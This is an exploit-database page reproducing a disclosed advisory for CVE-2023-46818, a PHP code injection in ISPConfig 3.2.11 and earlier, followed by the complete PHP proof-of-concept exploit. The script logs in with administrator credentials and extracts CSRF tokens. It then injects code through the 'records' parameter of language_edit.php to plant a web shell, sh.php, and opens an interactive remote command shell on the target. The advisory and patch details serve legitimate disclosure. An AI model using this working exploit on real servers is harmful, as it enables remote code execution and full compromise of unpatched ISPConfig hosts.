ISPConfig 3.2.11 PHP Code Injection Exploit

🗓️ 08 Dec 2023 00:00:00Reported by EgiXType

zdt🔗 0day.today👁 659 Views

ISPConfig 3.2.11 PHP Code Injection Vulnerabilit

Reporter	Title	Published	Views	Family All 26
GithubExploit	Exploit for Code Injection in Ispconfig	2 May 202504:51	–	githubexploit
GithubExploit	Exploit for Unrestricted Upload of File with Dangerous Type in Backdropcms Backdrop_Cms	27 Apr 202517:54	–	githubexploit
GithubExploit	Exploit for Code Injection in Ispconfig	13 Apr 202519:12	–	githubexploit
GithubExploit	Exploit for Code Injection in Ispconfig	28 May 202515:18	–	githubexploit
GithubExploit	Exploit for Code Injection in Ispconfig	6 Sep 202502:27	–	githubexploit
GithubExploit	Exploit for Code Injection in Ispconfig	14 Jun 202513:38	–	githubexploit
GithubExploit	Exploit for Code Injection in Ispconfig	31 Jul 202521:32	–	githubexploit
GithubExploit	Exploit for Code Injection in Ispconfig	8 Oct 202411:22	–	githubexploit
GithubExploit	Exploit for Code Injection in Ispconfig	14 Jun 202513:38	–	githubexploit
GithubExploit	Exploit for Code Injection in Ispconfig	13 Apr 202514:55	–	githubexploit

------------------------------------------------------------------------
ISPConfig <= 3.2.11 (language_edit.php) PHP Code Injection Vulnerability
------------------------------------------------------------------------


[-] Software Link:

https://www.ispconfig.org


[-] Affected Versions:

Version 3.2.11 and prior versions.


[-] Vulnerabilities Description:

User input passed through the "records" POST parameter to
/admin/language_edit.php is not properly sanitized before being used
to dynamically generate PHP code that will be executed by the
application. This can be exploited by malicious administrator users to
inject and execute arbitrary PHP code on the web server.


[-] Proof of Concept:

https://karmainsecurity.com/pocs/CVE-2023-46818.php
(Packet Storm Editor Note: See bottom of this file for PoC)


[-] Solution:

Upgrade to version 3.2.11p1 or later.


[-] Disclosure Timeline:

[25/10/2023] - Vendor notified
[26/10/2023] - Version 3.2.11p1 released
[27/10/2023] - CVE identifier assigned
[07/12/2023] - Publication of this advisory


[-] CVE Reference:

The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the name CVE-2023-46818 to this vulnerability.


[-] Credits:

Vulnerability discovered by Egidio Romano.


[-] Original Advisory:

https://karmainsecurity.com/KIS-2023-13


[-] Other References:

https://www.ispconfig.org/blog/ispconfig-3-2-11p1-released/



--- CVE-2023-46818.php PoC ---

<?php

/*
    ------------------------------------------------------------------------
    ISPConfig <= 3.2.11 (language_edit.php) PHP Code Injection Vulnerability
    ------------------------------------------------------------------------

    author..............: Egidio Romano aka EgiX
    mail................: n0b0d13s[at]gmail[dot]com
    software link.......: https://www.ispconfig.org

    +-------------------------------------------------------------------------+
    | This proof of concept code was written for educational purpose only.    |
    | Use it at your own risk. Author will be not responsible for any damage. |
    +-------------------------------------------------------------------------+

    [-] Vulnerability Description:

    User input passed through the "records" POST parameter to /admin/language_edit.php is
    not properly sanitized before being used to dynamically generate PHP code that will be
    executed by the application. This can be exploited by malicious administrator users to
    inject and execute arbitrary PHP code on the web server.

    [-] Original Advisory:

    https://karmainsecurity.com/KIS-2023-13
*/

set_time_limit(0);
error_reporting(E_ERROR);

if (!extension_loaded("curl")) die("[-] cURL extension required!\n");

if ($argc != 4) die("\nUsage: php $argv[0] <URL> <Username> <Password>\n\n");

list($url, $user, $pass) = [$argv[1], $argv[2], $argv[3]];

print "[+] Logging in with username '{$user}' and password '{$pass}'\n";

@unlink('./cookies.txt');

$ch = curl_init();

curl_setopt($ch, CURLOPT_URL, "{$url}login/");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_COOKIEJAR, './cookies.txt');
curl_setopt($ch, CURLOPT_COOKIEFILE, './cookies.txt');
curl_setopt($ch, CURLOPT_POSTFIELDS, "username=".urlencode($user)."&password=".urlencode($pass)."&s_mod=login");

if (preg_match('/Username or Password wrong/i', curl_exec($ch))) die("[-] Login failed!\n");

print "[+] Injecting shell\n";

$__phpcode = base64_encode("<?php print('____'); passthru(base64_decode(\$_SERVER['HTTP_C'])); print('____'); ?>");
$injection = "'];file_put_contents('sh.php',base64_decode('{$__phpcode}'));die;#";
$lang_file = str_shuffle("qwertyuioplkjhgfdsazxcvbnm").".lng";

curl_setopt($ch, CURLOPT_URL, "{$url}admin/language_edit.php");
curl_setopt($ch, CURLOPT_POSTFIELDS, "lang=en&module=help&lang_file={$lang_file}");

$res = curl_exec($ch);

if (!preg_match('/_csrf_id" value="([^"]+)"/i', $res, $csrf_id)) die("[-] CSRF ID not found!\n");
if (!preg_match('/_csrf_key" value="([^"]+)"/i', $res, $csrf_key)) die("[-] CSRF key not found!\n");

curl_setopt($ch, CURLOPT_POSTFIELDS, "lang=en&module=help&lang_file={$lang_file}&_csrf_id={$csrf_id[1]}&_csrf_key={$csrf_key[1]}&records[%5C]=".urlencode($injection));

curl_exec($ch);

print "[+] Launching shell\n";

curl_setopt($ch, CURLOPT_URL, "{$url}admin/sh.php");
curl_setopt($ch, CURLOPT_POST, false);

while(1)
{
    print "\nispconfig-shell# ";
    if (($cmd = trim(fgets(STDIN))) == "exit") break;
    curl_setopt($ch, CURLOPT_HTTPHEADER, ["C: ".base64_encode($cmd)]);
    preg_match('/____(.*)____/s', curl_exec($ch), $m) ? print $m[1] : die("\n[-] Exploit failed!\n");
}

08 Dec 2023 00:00Current

7High risk

Vulners AI Score7

CVSS 3.17.2

EPSS0.90534

SSVC